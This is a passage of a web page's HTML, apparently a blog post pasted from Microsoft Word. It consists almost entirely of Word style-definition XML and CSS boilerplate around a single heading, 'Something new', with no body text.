<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Cite"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Code"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Definition"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Keyboard"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Preformatted"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Sample"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Typewriter"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="HTML Variable"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Table"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation subject"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="No List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Outline List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Simple 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Classic 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Colorful 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Columns 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Grid 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table List 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table 3D effects 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Contemporary"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Elegant"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Professional"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Subtle 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Web 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Balloon Text"/>
<w:LsdException Locked="false" Priority="39" Name="Table Grid"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Table Theme"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" SemiHidden="true" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" QFormat="true"
Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" QFormat="true"
Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" QFormat="true"
Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" QFormat="true"
Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" QFormat="true"
Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" QFormat="true"
Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" SemiHidden="true"
UnhideWhenUsed="true" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="TOC Heading"/>
<w:LsdException Locked="false" Priority="41" Name="Plain Table 1"/>
<w:LsdException Locked="false" Priority="42" Name="Plain Table 2"/>
<w:LsdException Locked="false" Priority="43" Name="Plain Table 3"/>
<w:LsdException Locked="false" Priority="44" Name="Plain Table 4"/>
<w:LsdException Locked="false" Priority="45" Name="Plain Table 5"/>
<w:LsdException Locked="false" Priority="40" Name="Grid Table Light"/>
<w:LsdException Locked="false" Priority="46" Name="Grid Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="Grid Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="Grid Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="Grid Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="Grid Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="Grid Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="Grid Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="Grid Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="Grid Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="Grid Table 7 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="46" Name="List Table 1 Light"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark"/>
<w:LsdException Locked="false" Priority="51" Name="List Table 6 Colorful"/>
<w:LsdException Locked="false" Priority="52" Name="List Table 7 Colorful"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 1"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 1"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 1"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 1"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 1"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 1"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 2"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 2"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 2"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 2"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 2"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 2"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 3"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 3"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 3"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 3"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 3"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 3"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 4"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 4"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 4"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 4"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 4"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 4"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 5"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 5"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 5"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 5"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 5"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 5"/>
<w:LsdException Locked="false" Priority="46"
Name="List Table 1 Light Accent 6"/>
<w:LsdException Locked="false" Priority="47" Name="List Table 2 Accent 6"/>
<w:LsdException Locked="false" Priority="48" Name="List Table 3 Accent 6"/>
<w:LsdException Locked="false" Priority="49" Name="List Table 4 Accent 6"/>
<w:LsdException Locked="false" Priority="50" Name="List Table 5 Dark Accent 6"/>
<w:LsdException Locked="false" Priority="51"
Name="List Table 6 Colorful Accent 6"/>
<w:LsdException Locked="false" Priority="52"
Name="List Table 7 Colorful Accent 6"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin-top:0cm;
mso-para-margin-right:0cm;
mso-para-margin-bottom:8.0pt;
mso-para-margin-left:0cm;
line-height:107%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;
mso-fareast-language:EN-US;}
</style>
<![endif]-->
</div>
<h3 class="MsoNormal" style="text-align: left;">
<span lang="EN-US" style="mso-ansi-language: EN-US;">Something
new</span></h3>
<div class="MsoNormal" style="text-align: left;">
<br /></div>
<div class="MsoNormal" style="text-align: left;">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>RU</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
